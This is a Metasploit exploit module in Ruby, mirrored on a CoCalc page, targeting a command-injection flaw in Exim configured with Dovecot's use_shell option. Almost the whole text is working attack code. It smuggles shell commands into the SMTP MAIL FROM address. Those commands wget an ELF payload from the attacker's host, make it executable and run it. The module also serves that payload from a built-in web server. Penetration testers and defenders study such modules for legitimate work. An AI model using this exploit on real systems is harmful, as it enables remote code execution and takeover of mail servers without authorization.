CoCalc -- exim4_dovecot

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
¹⁹⁵⁹² views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Smtp
10
  include Msf::Exploit::Remote::HttpServer
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Exim and Dovecot Insecure Configuration Command Injection',
19
        'Description' => %q{
20
          This module exploits a command injection vulnerability against Dovecot with
21
          Exim using the "use_shell" option. It uses the sender's address to inject arbitrary
22
          commands, since this is one of the user-controlled variables. It has been
23
          successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common
24
          packages.
25
        },
26
        'Author' => [
27
          'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
28
          'eKKiM', # PoC
29
          'juan vazquez' # Metasploit module
30
        ],
31
        'License' => MSF_LICENSE,
32
        'References' => [
33
          [ 'OSVDB', '93004' ],
34
          [ 'EDB', '25297' ],
35
          [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
36
        ],
37
        'Privileged' => false,
38
        'Arch' => ARCH_X86,
39
        'Platform' => 'linux',
40
        'Payload' => {
41
          'DisableNops' => true
42
        },
43
        'Targets' => [
44
          [ 'Linux x86', {}],
45
        ],
46
        'DisclosureDate' => '2013-05-03',
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Reliability' => UNKNOWN_RELIABILITY,
50
          'Stability' => UNKNOWN_STABILITY,
51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),
59
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', '[email protected]']),
60
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
61
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
62
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
63
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
64
      ]
65
    )
66

67
    register_advanced_options(
68
      [
69
        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
70
      ]
71
    )
72

73
    deregister_options('MAILFROM')
74
  end
75

76
  # wait for the data to be sent
77
  def wait_linux_payload
78
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
79

80
    waited = 0
81
    while (not @elf_sent)
82
      select(nil, nil, nil, 1)
83
      waited += 1
84
      if (waited > datastore['HTTP_DELAY'])
85
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
86
      end
87
    end
88
  end
89

90
  # Handle incoming requests from the server
91
  def on_request_uri(cli, request)
92
    if (not @pl)
93
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
94
      return
95
    end
96
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
97
    @elf_sent = true
98
    send_response(cli, @pl)
99
  end
100

101
  def exploit
102
    @pl = generate_payload_exe
103
    @elf_sent = false
104

105
    #
106
    # start our web server to deploy the final payload
107
    #
108
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8 + rand(8))
109
    resource_uri = '/' + downfile
110

111
    if (datastore['DOWNHOST'])
112
      service_url_payload = datastore['DOWNHOST'] + resource_uri
113
    else
114

115
      # Needs to be on the port 80
116
      if datastore['SRVPORT'].to_i != 80
117
        fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
118
      end
119

120
      # we use SRVHOST as download IP for the coming wget command.
121
      # SRVHOST needs a real IP address of our download host
122
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
123
        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
124
      else
125
        srv_host = datastore['SRVHOST']
126
      end
127

128
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
129
      service_url_payload = srv_host + resource_uri
130
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
131
      start_service({
132
        'Uri' => {
133
          'Proc' => Proc.new { |cli, req|
134
            on_request_uri(cli, req)
135
          },
136
          'Path' => resource_uri
137
        },
138
        'ssl' => false # do not use SSL
139
      })
140

141
    end
142

143
    connect
144

145
    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
146
    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
147
      disconnect
148
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
149
    end
150

151
    ehlo = datastore['EHLO']
152
    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
153
    ehlo_resp.each_line do |line|
154
      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
155
    end
156

157
    #
158
    # Initiate the message
159
    #
160
    filename = rand_text_alpha_lower(8)
161
    from = rand_text_alpha(3)
162
    from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`"
163
    from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
164
    from << "`/tmp/#{filename}`"
165
    from << "@#{ehlo}"
166
    to = datastore['MAILTO']
167

168
    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
169
    resp ||= 'no response'
170
    msg = "MAIL: #{resp.strip}"
171
    if not resp or resp[0, 3] != '250'
172
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
173
    else
174
      print_status("#{rhost}:#{rport} - #{msg}")
175
    end
176

177
    resp = raw_send_recv("RCPT TO: #{to}\r\n")
178
    resp ||= 'no response'
179
    msg = "RCPT: #{resp.strip}"
180
    if not resp or resp[0, 3] != '250'
181
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
182
    else
183
      print_status("#{rhost}:#{rport} - #{msg}")
184
    end
185

186
    resp = raw_send_recv("DATA\r\n")
187
    resp ||= 'no response'
188
    msg = "DATA: #{resp.strip}"
189
    if not resp or resp[0, 3] != '354'
190
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
191
    else
192
      print_status("#{rhost}:#{rport} - #{msg}")
193
    end
194

195
    message = "Subject: test\r\n"
196
    message << "\r\n"
197
    message << ".\r\n"
198

199
    resp = raw_send_recv(message)
200
    msg = "DELIVER: #{resp.strip}"
201
    if not resp or resp[0, 3] != '250'
202
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
203
    else
204
      print_status("#{rhost}:#{rport} - #{msg}")
205
    end
206
    disconnect
207

208
    # wait for payload download
209
    if (datastore['DOWNHOST'])
210
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
211
      select(nil, nil, nil, datastore['HTTP_DELAY'])
212
    else
213
      wait_linux_payload
214
    end
215
    register_file_for_cleanup("/tmp/#{filename}")
216
  end
217
end
218

219
Product

Resources

Company
